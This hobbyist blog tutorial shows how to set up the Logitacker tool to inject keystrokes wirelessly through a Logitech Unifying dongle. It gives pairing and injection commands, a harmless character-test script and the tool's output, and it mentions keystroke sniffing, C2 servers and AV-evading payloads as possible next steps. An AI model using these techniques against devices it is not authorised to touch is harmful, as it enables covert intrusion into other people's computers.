You are here: Home Articles Logitacker - basic HID usage

Logitacker - basic HID usage

Details
Category: Articles
Hits: 1048

A little fast article about using Logitacker for HID injection, using transmitter and a dongle, nothing fancy :)

If you read my piece about the Logitacker project it's time to dive in a little deeper.

So, what is it ?. It's a small project using Logitech Unifying dongles for payload delivery. You could use something really nice and expensive, or, you could diy on the cheap, using something like Logitacker.
Basically it's a special dongle that can run scripting, and a standard Unifying dongle, bought from any retail outlet. So, what's it for ?
Well, IF we can sniff the pairing proces, we can use it for intercepting keystrokes, in realtime, and injecting our own data back. But, we could also use it like a kind of remote RubberDucky, using it's scripting system.
That way, we have a normal dongle, acting as a keyboard, using drivers allready baked in to Windows 10, so there should be some fun times ahead ;)

Onward and upwards, let's make this thing work :)

Before we can do anything, we need to pair the dongle and Logitacker. Next up, we store the dongle to LT's memory, so we know where it is, and we define a payload script to test with. Should be fun, right ?

 First we set the Logitech dongle in pairing mode, using it's administrator software.

Next, we tell Logitacker to pair to it, using

pair device run

It should pair with the dongle, so try a devices list, and see if you can se it

LOGITacker (injection) $ devices list
B4:82:ED:A0:09 'unknown name' keyboard: no mouse: yes
        class: Logitech Unifying compatible device WPID: 0x0000 dongle WPID: 0x0000
B4:82:ED:A0:0B 'unknown name' keyboard: encrypted mouse: no
        class: Logitech Unifying compatible device WPID: 0x0000 dongle WPID: 0x0000
A7:02:9D:25:08 'LOGITacker' keyboard: encrypted mouse: yes
        class: Logitech Unifying compatible device WPID: 0x1337 dongle WPID: 0x8802 (Nordic)
        link key: 02FDA725BE********637AE0313EF

If you can, great we're almost ready to rock. Next, we need to set up a script, Mines just a standard test script I keep around for testing if all the characters made it through, so I highly suggest you make one like it, for troubleshooting character set problems.

script show
script start
0001: string  q w e r t y u i o p 
0002: string  a s d f g h j k l  
0003: string  zx c v b n m  
0004: string  !  # % & / ( ) = ? ` "
0005: string  @ $ { [ ] } * ' ; : _ - . ,
script end
LOGITacker (injection) $

When we're done, we need to define a target for injecting, and a language to use. Here it's my settings, your will be different.

inject target <target address>

options inject language da

Place the logitech dongle into a Windows workstation, or anything else you might have. Open a test editor, and let go of the keyboard and mouse :)

On the Logotacker attack system, fire the script

inject execute

 

LOGITacker (injection) $ inject execute
<info> LOGITACKER_PROCESSOR_INJECT: process string injection:  q w e r t y u i o p 
<info> LOGITACKER: Injection processing resumed
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: process string injection:  a s d f g h j k l  
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: process string injection:  zx c v b n m  
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: process string injection:  !  # % & / ( ) = ? ` "
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: process string injection:  @ $ { [ ] } * ' ; : _ - . ,
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: No more tasks scheduled
<info> LOGITACKER_PROCESSOR_INJECT: script execution succeeded
LOGITacker (injection) $

If all this caused no errors let's save the config, so we have it.

options store

Or save the dongle settings with

devices storage save <dongle address>

To load them if you have rebooted Logitacker, use

devices storage load <address>

There you go.

Now I leave it up to you to go do something fun with this. Remember, it's a payload delivery system, not a magic bullet. It can only do what you yourself could do from behind the keyboard.
On a normal patched system, using dongles you haven't gotten your hands on, it will require you to sniff out the pairing process. You also have to make a C2 server, and AV evading payloads, and PowerShell scripts yourself, for this to be truly effective. But as an alternative to running around with a Bash Bunny, or spending big dollars on a turn-key system, it's a nice toy to have. The posibillties are endless :)

You have no rights to post comments